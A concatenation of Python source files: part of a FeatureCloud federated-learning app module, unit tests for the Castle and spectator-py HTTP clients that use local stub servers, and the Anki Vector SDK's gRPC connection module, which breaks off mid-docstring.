send_to_self: self._app.data_incoming.append((data, self._app.id)) def configure_smpc(self, exponent: int = 8, shards: int = 0, operation: SMPCOperation = SMPCOperation.ADD, serialization: SMPCSerialization = SMPCSerialization.JSON): """ Configures successive usage of SMPC aggregation performed in the FeatureCloud controller. 
Parameters ---------- exponent : int, default=8 exponent to be used for converting floating point numbers to fixed-point numbers shards : int, default=0 number of secrets to be created, if 0, the total number of participants will be used operation : SMPCOperation, default=SMPCOperation.ADD operation to perform for aggregation serialization : SMPCSerialization, default=SMPCSerialization.JSON serialization to be used for the data """ self._app.default_smpc['exponent'] = exponent self._app.default_smpc['shards'] = shards self._app.default_smpc['operation'] = operation.value self._app.default_smpc['serialization'] = serialization.value def update(self, message: Union[str, None] = None, progress: Union[float, None] = None, state: Union[State, None] = None): """ Updates information about the execution. Parameters ---------- message : str message briefly summarizing what is happening currently progress : float number between 0 and 1, indicating the overall progress state : State or None overall state (running, error or action_required) """ if message and len(message) > 40: self._app.log('message is too long (max: 40)', level=LogLevel.FATAL) if progress is not None and (progress < 0 or progress > 1): self._app.log('progress must be between 0 and 1', level=LogLevel.FATAL) if state is not None and state != State.RUNNING and state != State.ERROR and state != State.ACTION: self._app.log('invalid state', level=LogLevel.FATAL) self._app.status_message = message self._app.status_progress = progress self._app.status_state = state.value if state else None def store(self, key: str, value): """ Store allows to share data across different AppState instances. Parameters ---------- key: str value: """ self._app.internal[key] = value def load(self, key: str): """ Load allows to access data shared across different AppState instances. Parameters ---------- key: str Returns ------- value: Value stored previously using store """ return self._app.internal.get(key) def log(self, msg, level: LogLevel = LogLevel.DEBUG): """ Prints a log message or raises an exception according to the log level. Parameters ---------- msg : str message to be displayed level : LogLevel, default=LogLevel.DEBUG determines the channel (stdout, stderr) or whether to trigger an exception """ self._app.log(f'[State: {self.name}] {msg}') def app_state(name: str, role: Role = Role.BOTH, app_instance: Union[App, None] = None, **kwargs): if app_instance is None: app_instance = app participant, coordinator = role.value if not participant and not coordinator: app_instance.log('either participant or coordinator must be True', level=LogLevel.FATAL) def func(state_class): app_instance._register_state(name, state_class, participant, coordinator, **kwargs) return state_class return func def _serialize_outgoing(data, is_json=False): """ Transforms a Python data object into a byte serialization. Parameters ---------- data : object data to serialize is_json : bool, default=False indicates whether JSON serialization is required Returns ---------- serialized data as bytes """ if not is_json: return pickle.dumps(data) return json.dumps(data) def _deserialize_incoming(data: bytes, is_json=False): """ Transforms serialized data bytes into a Python object. 
Parameters ---------- data : bytes data to deserialize is_json : bool, default=False indicates whether JSON deserialization should be used Returns ---------- deserialized data """ if not is_json: return pickle.loads(data) return json.loads(data) def _aggregate(data, operation: SMPCOperation): """ Aggregates a list of received values. Parameters ---------- data : array_like list of data pieces operation : SMPCOperation operation to use for aggregation (add or multiply) Returns ---------- aggregated value """ data_np = [np.array(d) for d in data] aggregate = data_np[0] if operation == SMPCOperation.ADD: for d in data_np[1:]: aggregate = aggregate + d if operation == SMPCOperation.MULTIPLY: for d in data_np[1:]: aggregate = aggregate * d return aggregate app = App()
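# --- Illustrative usage sketch (not part of the module above) ---
# A minimal two-state app built on the API defined in this file: app_state,
# AppState.register_transition, send_data_to_coordinator, aggregate_data,
# broadcast_data and await_data. The state names 'initial' and 'terminal' and the
# payload [1, 2, 3] are placeholders chosen for the example only.

@app_state('initial', Role.BOTH)
class InitialState(AppState):

    def register(self):
        # declare the single outgoing transition of this state
        self.register_transition('terminal', Role.BOTH)

    def run(self) -> str:
        # every participant (including the coordinator) contributes a local vector
        self.send_data_to_coordinator([1, 2, 3], send_to_self=True)
        if self.is_coordinator:
            # coordinator: element-wise sum of all contributions, then broadcast
            result = self.aggregate_data(SMPCOperation.ADD)
            self.broadcast_data(result, send_to_self=False)
        else:
            # participants: wait for the broadcasted aggregate
            result = self.await_data(n=1, unwrap=True)
        self.log(f'aggregated value: {result}')
        return 'terminal'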
send_request_test.py
import threading from requests import Response import responses from castle.test import unittest from castle.core.send_request import CoreSendRequest from castle.configuration import configuration try: from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer except ImportError: from http.server import BaseHTTPRequestHandler, HTTPServer def run_server(): class SimpleHandler(BaseHTTPRequestHandler): def do_POST(self): body = '{"action":"allow", "user_id": "123"}'.encode() self.send_response(201) self.send_header('content-type', 'application/json') self.send_header('content-length', len(body)) self.end_headers() self.wfile.write(body) server = HTTPServer(('', 65521), SimpleHandler) httpd_thread = threading.Thread(target=server.serve_forever) httpd_thread.setDaemon(True) httpd_thread.start() return httpd_thread class CoreSendRequestTestCase(unittest.TestCase): def test_init_headers(self): headers = {'X-Castle-Client-Id': '1234'} self.assertEqual(CoreSendRequest(headers).headers, headers) def test_init_base_url(self): self.assertEqual(CoreSendRequest().base_url, 'https://api.castle.io/v1') @responses.activate def test_build_query(self): data = {'event': '$login.authenticate', 'user_id': '12345'} configuration.api_secret = 'api_secret' # JSON requires double quotes for its strings response_text = {"action": "allow", "user_id": "12345"} responses.add( responses.POST, 'https://api.castle.io/v1/authenticate', json=response_text, status=200 ) res = CoreSendRequest().build_query('post', 'authenticate', data) self.assertIsInstance(res, Response) self.assertEqual(res.status_code, 200) self.assertEqual(res.json(), response_text) configuration.api_secret = None def test_connection_pooled(self): configuration.base_url = 'http://localhost:65521' run_server() request = CoreSendRequest() data = {'event': '$login.authenticate', 'user_id': '12345'} response = request.build_query('post', 'authenticate', data) num_pools = len(response.connection.poolmanager.pools.keys()) configuration.base_url = 'https://api.castle.io/v1' self.assertEqual(num_pools, 1) def test_build_url(self): self.assertEqual( CoreSendRequest().build_url('authenticate'), 'https://api.castle.io/v1/authenticate' ) def test_build_url_with_port(self): configuration.base_url = 'http://api.castle.local:3001' self.assertEqual( CoreSendRequest().build_url('test'), 'http://api.castle.local:3001/test' ) def test_verify_true(self): self.assertEqual(CoreSendRequest().verify(), True) def test_verify_false(self): configuration.base_url = 'http://api.castle.io' self.assertEqual(CoreSendRequest().verify(), False) configuration.base_url = 'https://api.castle.io/v1'
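# --- Side note (illustrative; not one of the test cases above) ---
# The `responses` library used in CoreSendRequestTestCase also records every stubbed
# call in `responses.calls`, so a test can assert on the outgoing request as well as
# the parsed response. Endpoint and payload below are placeholders.

import json
import requests
import responses

@responses.activate
def check_outgoing_body():
    responses.add(responses.POST, 'https://api.castle.io/v1/authenticate',
                  json={'action': 'allow'}, status=200)
    requests.post('https://api.castle.io/v1/authenticate',
                  json={'event': '$login.authenticate', 'user_id': '12345'})
    assert len(responses.calls) == 1
    sent = json.loads(responses.calls[0].request.body)
    assert sent['event'] == '$login.authenticate'

check_outgoing_body()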
test_http.py
import gzip import io import json import logging import threading import unittest from spectator import Registry from spectator.http import HttpClient try: from BaseHTTPServer import HTTPServer from BaseHTTPServer import BaseHTTPRequestHandler except ImportError: # python3 from http.server import HTTPServer from http.server import BaseHTTPRequestHandler logging.basicConfig(level=logging.DEBUG, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s') class HttpTest(unittest.TestCase): def setUp(self): self._server = HTTPServer(("localhost", 0), RequestHandler) self._uri = "http://localhost:{}/path".format(self._server.server_port) t = threading.Thread(target=self._server.serve_forever) t.start() def tearDown(self): self._server.shutdown() self._server.server_close() def test_do_post_ok(self): r = Registry() client = HttpClient(r) client.post_json(self._uri, '{"status": 200}', retry_delay=0) tags = { "mode": "http-client", "method": "POST", "client": "spectator-py", "status": "2xx", "statusCode": "200" } t = r.timer("http.req.complete", tags) self.assertEqual(t.count(), 1) def test_do_post_404(self): r = Registry() client = HttpClient(r) client.post_json(self._uri, '{"status": 404}', retry_delay=0) tags = { "mode": "http-client", "method": "POST", "client": "spectator-py", "status": "4xx", "statusCode": "404" } t = r.timer("http.req.complete", tags) self.assertEqual(t.count(), 1) def test_do_post_429(self): r = Registry() client = HttpClient(r) client.post_json(self._uri, '{"status": 429}', retry_delay=0) tags = { "mode": "http-client", "method": "POST", "client": "spectator-py", "status": "4xx", "statusCode": "429" } t = r.timer("http.req.complete", tags) self.assertEqual(t.count(), 1) def test_do_post_503(self): r = Registry() client = HttpClient(r) client.post_json(self._uri, '{"status": 503}', retry_delay=0) tags = { "mode": "http-client", "method": "POST", "client": "spectator-py", "status": "5xx", "statusCode": "503" } t = r.timer("http.req.complete", tags) self.assertEqual(t.count(), 1) def test_do_post_bad_json(self): r = Registry() client = HttpClient(r) client.post_json(self._uri, '{"status": ', retry_delay=0) tags = { "mode": "http-client", "method": "POST", "client": "spectator-py", "status": "4xx", "statusCode": "400" } t = r.timer("http.req.complete", tags) self.assertEqual(t.count(), 1) def test_do_post_encode(self): r = Registry() client = HttpClient(r) client.post_json(self._uri, {"status": 202}, retry_delay=0) tags = { "mode": "http-client", "method": "POST", "client": "spectator-py", "status": "2xx", "statusCode": "202" } t = r.timer("http.req.complete", tags) self.assertEqual(t.count(), 1) def test_do_post_network_error(self): self.tearDown() r = Registry() client = HttpClient(r) client.post_json(self._uri, "{}", retry_delay=0) tags = { "mode": "http-client", "method": "POST", "client": "spectator-py", "status": "URLError", "statusCode": "URLError" } t = r.timer("http.req.complete", tags) self.assertEqual(t.count(), 1) def test_do_post_no_logging(self): r = Registry() client = HttpClient(r) client.post_json(self._uri, '{"status": 429}', retry_delay=0, disable_logging=False) class RequestHandler(BaseHTTPRequestHandler): @staticmethod def _compress(entity): out = io.BytesIO() with gzip.GzipFile(fileobj=out, mode="w") as f: f.write(entity.encode('utf-8')) return out.getvalue() def do_POST(self): try: length = int(self.headers['Content-Length']) entity = io.BytesIO(self.rfile.read(length)) data = json.loads(gzip.GzipFile(fileobj=entity).read().decode()) 
self.send_response(data["status"]) self.send_header('Content-Encoding', 'gzip') self.end_headers() self.wfile.write(self._compress("received: {}".format(data))) except Exception as e: self.send_response(400) self.end_headers() msg = "error processing request: {}".format(e) self.wfile.write(msg.encode('utf-8')) def log_message(self, format, *args): pass
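# --- Standalone illustration of the gzip framing exercised above (not part of the suite) ---
# RequestHandler.do_POST expects a gzip-compressed JSON body and answers with a
# gzip-compressed reply; this is the same round trip in isolation.

import gzip
import io
import json

payload = json.dumps({"status": 200})

buf = io.BytesIO()
with gzip.GzipFile(fileobj=buf, mode="w") as f:
    f.write(payload.encode("utf-8"))
wire_bytes = buf.getvalue()                     # what the client puts on the wire

decoded = json.loads(gzip.GzipFile(fileobj=io.BytesIO(wire_bytes)).read().decode())
assert decoded == {"status": 200}               # what do_POST recovers from the body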
connection.py
# Copyright (c) 2018 Anki, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License in the file LICENSE.txt or at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Management of the connection to and from Vector. """ # __all__ should order by constants, event classes, other classes, functions. __all__ = ['ControlPriorityLevel', 'Connection', 'on_connection_thread'] import asyncio from concurrent import futures from enum import Enum import functools import inspect import logging import platform import sys import threading import time from typing import Any, Awaitable, Callable, Coroutine, Dict, List from google.protobuf.text_format import MessageToString import grpc import aiogrpc from . import util from .exceptions import (connection_error, VectorAsyncException, VectorBehaviorControlException, VectorConfigurationException, VectorControlException, VectorControlTimeoutException, VectorInvalidVersionException, VectorNotFoundException) from .messaging import client, protocol from .version import __version__ class ControlPriorityLevel(Enum): """Enum used to specify the priority level for the program.""" #: Runs above mandatory physical reactions, will drive off table, perform while on a slope, #: ignore low battery state, work in the dark, etc. OVERRIDE_BEHAVIORS_PRIORITY = protocol.ControlRequest.OVERRIDE_BEHAVIORS # pylint: disable=no-member #: Runs below Mandatory Physical Reactions such as tucking Vector's head and arms during a fall, #: yet above Trigger-Word Detection. Default for normal operation. DEFAULT_PRIORITY = protocol.ControlRequest.DEFAULT # pylint: disable=no-member #: Holds control of robot before/after other SDK connections #: Used to disable idle behaviors. Not to be used for regular behavior control. RESERVE_CONTROL = protocol.ControlRequest.RESERVE_CONTROL # pylint: disable=no-member class _ControlEventManager: """This manages every :class:`asyncio.Event` that handles the behavior control system. These include three events: granted, lost, and request. :class:`granted_event` represents the behavior system handing control to the SDK. :class:`lost_event` represents a higher priority behavior taking control away from the SDK. :class:`request_event` Is a way of alerting :class:`Connection` to request control. 
""" def __init__(self, loop: asyncio.BaseEventLoop = None, priority: ControlPriorityLevel = None): self._granted_event = asyncio.Event(loop=loop) self._lost_event = asyncio.Event(loop=loop) self._request_event = asyncio.Event(loop=loop) self._has_control = False self._priority = priority self._is_shutdown = False @property def granted_event(self) -> asyncio.Event: """This event is used to notify listeners that control has been granted to the SDK.""" return self._granted_event @property def lost_event(self) -> asyncio.Event: """Represents a higher priority behavior taking control away from the SDK.""" return self._lost_event @property def request_event(self) -> asyncio.Event: """Used to alert :class:`Connection` to request control.""" return self._request_event @property def has_control(self) -> bool: """Check to see that the behavior system has control (without blocking by checking :class:`granted_event`)""" return self._has_control @property def priority(self) -> ControlPriorityLevel: """The currently desired priority for the SDK.""" return self._priority @property def is_shutdown(self) -> bool: """Detect if the behavior control stream is supposed to shut down.""" return self._is_shutdown def request(self, priority: ControlPriorityLevel = ControlPriorityLevel.DEFAULT_PRIORITY) -> None: """Tell the behavior stream to request control via setting the :class:`request_event`. This will signal Connection's :func:`_request_handler` generator to send a request control message on the BehaviorControl stream. This signal happens asynchronously, and can be tracked using the :class:`granted_event` parameter. :param priority: The level of control in the behavior system. This determines which actions are allowed to interrupt the SDK execution. See :class:`ControlPriorityLevel` for more information. """ if priority is None: raise VectorBehaviorControlException("Must provide a priority level to request. To disable control, use {}.release().", self.__class__.__name__) self._priority = priority self._request_event.set() def release(self) -> None: """Tell the behavior stream to release control via setting the :class:`request_event` while priority is ``None``. This will signal Connection's :func:`_request_handler` generator to send a release control message on the BehaviorControl stream. This signal happens asynchronously, and can be tracked using the :class:`lost_event` parameter. """ self._priority = None self._request_event.set() def update(self, enabled: bool) -> None: """Update the current state of control (either enabled or disabled) :param enabled: Used to enable/disable behavior control """ self._has_control = enabled if enabled: self._granted_event.set() self._lost_event.clear() else: self._lost_event.set() self._granted_event.clear() def shutdown(self) -> None: """Tells the control stream to shut down. This will return control to the rest of the behavior system. """ self._has_control = False self._granted_event.set() self._lost_event.set() self._is_shutdown = True self._request_event.set() class Connection: """Creates and maintains a aiogrpc connection including managing the connection thread. The connection thread decouples the actual messaging layer from the user's main thread, and requires any network requests to be ran using :func:`asyncio.run_coroutine_threadsafe` to make them run on the other thread. Connection provides two helper functions for running a function on the connection thread: :func:`~Connection.run_coroutine` and :func:`~Connection.run_soon`. 
This class may be used to bypass the structures of the python sdk handled by :class:`~anki_vector.robot.Robot`, and instead talk to aiogrpc more directly. The values for the cert_file location and the guid can be found in your home directory in the sdk_config.ini file. .. code-block:: python import anki_vector # Connect to your Vector conn = anki_vector.connection.Connection("Vector-XXXX", "XX.XX.XX.XX:443", "/path/to/file.cert", "<guid>") conn.connect() # Run your commands async def play_animation(): # Run your commands anim = anki_vector.messaging.protocol.Animation(name="anim_pounce_success_02") anim_request = anki_vector.messaging.protocol.PlayAnimationRequest(animation=anim) return await conn.grpc_interface.PlayAnimation(anim_request) # This needs to be run in an asyncio loop conn.run_coroutine(play_animation()).result() # Close the connection conn.close() :param name: Vector's name in the format of "Vector-XXXX". :param host: The IP address and port of Vector in the format "XX.XX.XX.XX:443". :param cert_file: The location of the certificate file on disk. :param guid: Your robot's unique secret key. :param behavior_control_level: pass one of :class:`ControlPriorityLevel` priority levels if the connection requires behavior control, or None to decline control. """ def __init__(self, name: str, host: str, cert_file: str, guid: str, behavior_control_level: ControlPriorityLevel = ControlPriorityLevel.DEFAULT_PRIORITY): if cert_file is None: raise VectorConfigurationException("Must provide a cert file to authenticate to Vector.") self._loop: asyncio.BaseEventLoop = None self.name = name self.host = host self.cert_file = cert_file self._interface = None self._channel = None self._has_control = False self._logger = util.get_class_logger(__name__, self) self._control_stream_task = None self._control_events: _ControlEventManager = None self._guid = guid self._thread: threading.Thread = None self._ready_signal: threading.Event = threading.Event() self._done_signal: asyncio.Event = None self._conn_exception = False self._behavior_control_level = behavior_control_level self.active_commands = [] @property def loop(self) -> asyncio.BaseEventLoop: """A direct reference to the loop on the connection thread. Can be used to run functions in on thread. .. testcode:: import anki_vector import asyncio async def connection_function(): print("I'm running in the connection thread event loop.") with anki_vector.Robot() as robot: asyncio.run_coroutine_threadsafe(connection_function(), robot.conn.loop) :returns: The loop running inside the connection thread """ if self._loop is None: raise VectorAsyncException("Attempted to access the connection loop before it was ready") return self._loop @property def thread(self) -> threading.Thread: """A direct reference to the connection thread. Available to callers to determine if the current thread is the connection thread. .. testcode:: import anki_vector import threading with anki_vector.Robot() as robot: if threading.current_thread() is robot.conn.thread: print("This code is running on the connection thread") else: print("This code is not running on the connection thread") :returns: The connection thread where all of the grpc messages are being processed. """ if self._thread is None: raise VectorAsyncException("Attempted to access the connection loop before it was ready") return self._thread @property def grpc_interface(self) -> client.ExternalInterfaceStub: """A direct reference to the connected aiogrpc interface. 
This may be used to directly call grpc messages bypassing :class:`anki_vector.Robot` .. code-block:: python import anki_vector # Connect to your Vector conn = anki_vector.connection.Connection("Vector-XXXX", "XX.XX.XX.XX:443", "/path/to/file.cert", "<guid>") conn.connect() # Run your commands async def play_animation(): # Run your commands anim = anki_vector.messaging.protocol.Animation(name="anim_pounce_success_02") anim_request = anki_vector.messaging.protocol.PlayAnimationRequest(animation=anim) return await conn.grpc_interface.PlayAnimation(anim_request) # This needs to be run in an asyncio loop conn.run_coroutine(play_animation()).result() # Close the connection conn.close() """ return self._interface @property def behavior_control_level(self) -> ControlPriorityLevel: """Returns the specific :class:`ControlPriorityLevel` requested for behavior control. To be able to directly control Vector's motors, override his screen, play an animation, etc., the :class:`Connection` will need behavior control. This property identifies the enumerated level of behavior control that the SDK will maintain over the robot. For more information about behavior control, see :ref:`behavior <behavior>`. .. code-block:: python import anki_vector with anki_vector.Robot() as robot: print(robot.conn.behavior_control_level) # Will print ControlPriorityLevel.DEFAULT_PRIORITY robot.conn.release_control() print(robot.conn.behavior_control_level) # Will print None """ return self._behavior_control_level @property def requires_behavior_control(self) -> bool: """True if the :class:`Connection` requires behavior control. To be able to directly control Vector's motors, override his screen, play an animation, etc., the :class:`Connection` will need behavior control. This boolean signifies that the :class:`Connection` will try to maintain control of Vector's behavior system even after losing control to higher priority robot behaviors such as returning home to charge a low battery. For more information about behavior control, see :ref:`behavior <behavior>`. .. code-block:: python import time import anki_vector def callback(robot, event_type, event): robot.conn.request_control() print(robot.conn.requires_behavior_control) # Will print True robot.anim.play_animation_trigger('GreetAfterLongTime') robot.conn.release_control() with anki_vector.Robot(behavior_control_level=None) as robot: print(robot.conn.requires_behavior_control) # Will print False robot.events.subscribe(callback, anki_vector.events.Events.robot_observed_face) # Waits 10 seconds. Show Vector your face. time.sleep(10) """ return self._behavior_control_level is not None @property def control_lost_event(self) -> asyncio.Event: """This provides an :class:`asyncio.Event` that a user may :func:`wait()` upon to detect when Vector has taken control of the behavior system at a higher priority. .. testcode:: import anki_vector async def auto_reconnect(conn: anki_vector.connection.Connection): await conn.control_lost_event.wait() conn.request_control() """ return self._control_events.lost_event @property def control_granted_event(self) -> asyncio.Event: """This provides an :class:`asyncio.Event` that a user may :func:`wait()` upon to detect when Vector has given control of the behavior system to the SDK program. .. 
testcode:: import anki_vector async def wait_for_control(conn: anki_vector.connection.Connection): await conn.control_granted_event.wait() # Run commands that require behavior control """ return self._control_events.granted_event def request_control(self, behavior_control_level: ControlPriorityLevel = ControlPriorityLevel.DEFAULT_PRIORITY, timeout: float = 10.0): """Explicitly request behavior control. Typically used after detecting :func:`control_lost_event`. To be able to directly control Vector's motors, override his screen, play an animation, etc., the :class:`Connection` will need behavior control. This function will acquire control of Vector's behavior system. This will raise a :class:`VectorControlTimeoutException` if it fails to gain control before the timeout. For more information about behavior control, see :ref:`behavior <behavior>` .. testcode:: import anki_vector async def auto_reconnect(conn: anki_vector.connection.Connection): await conn.control_lost_event.wait() conn.request_control(timeout=5.0) :param timeout: The time allotted to attempt a connection, in seconds. :param behavior_control_level: request control of Vector's behavior system at a specific level of control. See :class:`ControlPriorityLevel` for more information. """ if not isinstance(behavior_control_level, ControlPriorityLevel): raise TypeError("behavior_control_level must be of type ControlPriorityLevel") if self._thread is threading.current_thread(): return asyncio.ensure_future(self._request_control(behavior_control_level=behavior_control_level, timeout=timeout), loop=self._loop) return self.run_coroutine(self._request_control(behavior_control_level=behavior_control_level, timeout=timeout)) async def _request_control(self, behavior_control_level: ControlPriorityLevel = ControlPriorityLevel.DEFAULT_PRIORITY, timeout: float = 10.0): self._behavior_control_level = behavior_control_level self._control_events.request(self._behavior_control_level) try: self._has_control = await asyncio.wait_for(self.control_granted_event.wait(), timeout) except futures.TimeoutError as e: raise VectorControlTimeoutException(f"Surpassed timeout of {timeout}s") from e def release_control(self, timeout: float = 10.0): """Explicitly release control. Typically used after detecting :func:`control_lost_event`. To be able to directly control Vector's motors, override his screen, play an animation, etc., the :class:`Connection` will need behavior control. This function will release control of Vector's behavior system. This will raise a :class:`VectorControlTimeoutException` if it fails to receive a control_lost event before the timeout. .. testcode:: import anki_vector async def wait_for_control(conn: anki_vector.connection.Connection): await conn.control_granted_event.wait() # Run commands that require behavior control conn.release_control() :param timeout: The time allotted to attempt to release control, in seconds. """ if self._thread is threading.current_thread(): return asyncio.ensure_future(self._release_control(timeout=timeout), loop=self._loop) return self.run_coroutine(self._release_control(timeout=timeout)) async def _release_control(self, timeout: float = 10.0): self._behavior_control_level = None self._control_events.release() try: self._has_control = await asyncio.wait_for(self.control_lost_event.wait(), timeout) except futures.TimeoutError as e: raise VectorControlTimeoutException(f"Surpassed timeout of {timeout}s") from e def connect(self, timeout: float = 10.0) -> None: """Connect to Vector. 
This will start the connection thread which handles all messages between Vector and Python. .. code-block:: python import anki_vector # Connect to your Vector conn = anki_vector.connection.Connection("Vector-XXXX", "XX.XX.XX.XX:443", "/path/to/file.cert", "<guid>") conn.connect() # Run your commands async def play_animation(): # Run your commands anim = anki_vector.messaging.protocol.Animation(name="anim_pounce_success_02") anim_request = anki_vector.messaging.protocol.PlayAnimationRequest(animation=anim) return await conn.grpc_interface.PlayAnimation(anim_request) # This needs to be run in an asyncio loop conn.run_coroutine(play_animation()).result() # Close the connection conn.close() :param timeout: The time allotted to attempt a connection, in seconds. """ if self._thread: raise VectorAsyncException("\n\nRepeated connections made to open Connection.") self._ready_signal.clear() self._thread = threading.Thread(target=self._connect, args=(timeout,), daemon=True, name="gRPC Connection Handler Thread") self._thread.start() ready = self._ready_signal.wait(timeout=2 * timeout) if not ready: raise VectorNotFoundException() if hasattr(self._ready_signal, "exception"): e = getattr(self._ready_signal, "exception") delattr(self._ready_signal, "exception") raise e def _connect(self, timeout: float) -> None: """The function that runs on the connection thread. This will connect to Vector, and establish the BehaviorControl stream. """ try: if threading.main_thread() is threading.current_thread(): raise VectorAsyncException("\n\nConnection._connect must be run outside of the main thread.") self._loop = asyncio.new_event_loop() asyncio.set_event_loop(self._loop) self._done_signal = asyncio.Event() if not self._behavior_control_level: self._control_events = _ControlEventManager(self._loop) else: self._control_events = _ControlEventManager(self._loop, priority=self._behavior_control_level) trusted_certs = None with open(self.cert_file, 'rb') as cert: trusted_certs = cert.read() # Pin the robot certificate for opening the channel channel_credentials = aiogrpc.ssl_channel_credentials(root_certificates=trusted_certs) # Add authorization header for all the calls call_credentials = aiogrpc.access_token_call_credentials(self._guid) credentials = aiogrpc.composite_channel_credentials(channel_credentials, call_credentials) self._logger.info(f"Connecting to {self.host} for {self.name} using {self.cert_file}") self._channel = aiogrpc.secure_channel(self.host, credentials, options=(("grpc.ssl_target_name_override", self.name,),)) # Verify the connection to Vector is able to be established (client-side) try: # Explicitly grab _channel._channel to test the underlying grpc channel directly grpc.channel_ready_future(self._channel._channel).result(timeout=timeout) # pylint: disable=protected-access except grpc.FutureTimeoutError as e: raise VectorNotFoundException() from e self._interface = client.ExternalInterfaceStub(self._channel) # Verify Vector and the SDK have compatible protocol versions version = protocol.ProtocolVersionRequest(client_version=protocol.PROTOCOL_VERSION_CURRENT, min_host_version=protocol.PROTOCOL_VERSION_MINIMUM) protocol_version = self._loop.run_until_complete(self._interface.ProtocolVersion(version)) if protocol_version.result != protocol.ProtocolVersionResponse.SUCCESS or protocol.PROTOCOL_VERSION_MINIMUM > protocol_version.host_version: # pylint: disable=no-member raise VectorInvalidVersionException(protocol_version) self._control_stream_task = self._loop.create_task(self._open_connections()) 
# Initialze SDK sdk_module_version = __version__ python_version = platform.python_version() python_implementation = platform.python_implementation() os_version = platform.platform() cpu_version = platform.machine() initialize = protocol.SDKInitializationRequest(sdk_module_version=sdk_module_version, python_version=python_version, python_implementation=python_implementation, os_version=os_version, cpu_version=cpu_version) self._loop.run_until_complete(self._interface.SDKInitialization(initialize)) if self._behavior_control_level: self._loop.run_until_complete(self._request_control(behavior_control_level=self._behavior_control_level, timeout=timeout)) except Exception as e: # pylint: disable=broad-except # Propagate the errors to the calling thread setattr(self._ready_signal, "exception", e) self._loop.close() return finally: self._ready_signal.set() try: async def wait_until_done(): return await self._done_signal.wait() self._loop.run_until_complete(wait_until_done()) finally: self._loop.close() async def _request_handler(self): """Handles generating messages for the BehaviorControl stream.""" while await self._control_events.request_event.wait(): self._control_events.request_event.clear() if self._control_events.is_shutdown: return priority = self._control_events.priority if priority is None: msg = protocol.ControlRelease() msg = protocol.BehaviorControlRequest(control_release=msg) else: msg = protocol.ControlRequest(priority=priority.value) msg = protocol.BehaviorControlRequest(control_request=msg) self._logger.debug(f"BehaviorControl {MessageToString(msg, as_one_line=True)}") yield msg async def _open_connections(self): """Starts the BehaviorControl stream, and handles the messages coming back from the robot.""" try: async for response in self._interface.BehaviorControl(self._request_handler()): response_type = response.WhichOneof("response_type") if response_type == 'control_granted_response': self._logger.info(f"BehaviorControl {MessageToString(response, as_one_line=True)}") self._control_events.update(True) elif response_type == 'control_lost_event': self._cancel_active() self._logger.info(f"BehaviorControl {MessageToString(response, as_one_line=True)}") self._control_events.update(False) except futures.CancelledError: self._logger.debug('Behavior handler task was cancelled. This is expected during disconnection.') def _cancel_active(self): for fut in self.active_commands: if not fut.done(): fut.cancel() self.active_commands = [] def close(self): """Cleanup the connection, and shutdown all the event handlers. Usually this should be invoked by the Robot class when it closes. .. 
code-block:: python import anki_vector # Connect to your Vector conn = anki_vector.connection.Connection("Vector-XXXX", "XX.XX.XX.XX:443", "/path/to/file.cert", "<guid>") conn.connect() # Run your commands async def play_animation(): # Run your commands anim = anki_vector.messaging.protocol.Animation(name="anim_pounce_success_02") anim_request = anki_vector.messaging.protocol.PlayAnimationRequest(animation=anim) return await conn.grpc_interface.PlayAnimation(anim_request) # This needs to be run in an asyncio loop conn.run_coroutine(play_animation()).result() # Close the connection conn.close() """ if self._control_events: self._control_events.shutdown() # need to wait until all Futures were cancled before going on, # otherwise python 3.8+ will raise alot of CancelledErrors and time.sleep(2) if self._control_stream_task: self._control_stream_task.cancel() self.run_coroutine(self._control_stream_task).result() self._cancel_active() if self._channel: self.run_coroutine(self._channel.close()).result() self.run_coroutine(self._done_signal.set) self._thread.join(timeout=5) self._thread = None def run_soon(self, coro: Awaitable) -> None: """Schedules the given awaitable to run on the event loop for the connection thread. .. testcode:: import anki_vector import time async def my_coroutine(): print("Running on the connection thread") with anki_vector.Robot() as robot: robot.conn.run_soon(my_coroutine()) time.sleep(1) :param coro: The coroutine, task or any awaitable to schedule for execution on the connection thread. """ if coro is None or not inspect.isawaitable(coro): raise VectorAsyncException(f"\n\n{coro.__name__ if hasattr(coro, '__name__') else coro} is not awaitable, so cannot be ran with run_soon.\n") def soon(): try: asyncio.ensure_future(coro) except TypeError as e: raise VectorAsyncException(f"\n\n{coro.__name__ if hasattr(coro, '__name__') else coro} could not be ensured as a future.\n") from e if threading.current_thread() is self._thread: self._loop.call_soon(soon) else: self._loop.call_soon_threadsafe(soon) def run_coroutine(self, coro: Awaitable) -> Any: """Runs a given awaitable on the connection thread's event loop. Cannot be called from within the connection thread. .. testcode:: import anki_vector async def my_coroutine(): print("Running on the connection thread") return "Finished" with anki_vector.Robot() as robot: result = robot.conn.run_coroutine(my_coroutine()) :param coro: The coroutine, task or any other awaitable which should be executed. :returns: The result of the awaitable's execution. """ if threading.current_thread() is self._thread: raise VectorAsyncException("Attempting to invoke async from same thread." "Instead you may want to use 'run_soon'") if asyncio.iscoroutinefunction(coro) or asyncio.iscoroutine(coro): return self._run_coroutine(coro) if asyncio.isfuture(coro): async def future_coro(): return await coro return self._run_coroutine(future_coro()) if callable(coro): async def wrapped_coro(): return coro() return self._run_coroutine(wrapped_coro()) raise VectorAsyncException("\n\nInvalid parameter to run_coroutine: {}\n" "This function expects a coroutine, task, or awaitable.".format(type(coro))) def _run_coroutine(self, coro): return asyncio.run_coroutine_threadsafe(coro, self._loop) def on_connection_thread(log_messaging: bool = True, requires_control: bool = True, is_cancellable_behavior=False) -> Callable[[Coroutine[util.Component, Any, None]], Any]: """A decorator generator used internally to denote which functions will run on the connection thread. 
